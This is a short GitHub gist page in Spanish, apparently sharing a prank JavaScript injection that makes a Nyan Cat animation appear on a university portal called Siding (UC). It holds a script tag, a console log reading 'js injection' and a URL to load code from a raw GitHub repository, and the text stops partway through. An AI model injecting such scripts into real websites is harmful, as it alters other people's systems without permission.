Skip to content

Instantly share code, notes, and snippets.

View nacosta-cl's full-sized avatar
🐈
Petting my cat

Nicolás Acosta nacosta-cl

🐈
Petting my cat
View GitHub Profile
@lopezjurip
lopezjurip / gist:97771781262c18a24521
Last active August 29, 2015 14:20
Inyectar Nyancat al Siding (UC)
Este código no es mio.
Autor: Desconocido
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.4.min.js"></script><br />
<script>//<br />
// Este iframe fallaba<br />
//<iframe src="http://nyan.cat/" width="640" height="480"></iframe><br />
console.log("js injection ");//<br />
var url = "https://raw.github.com/jfix/nyancat/master";//<br />
var keyCode = 16; // shift key<br />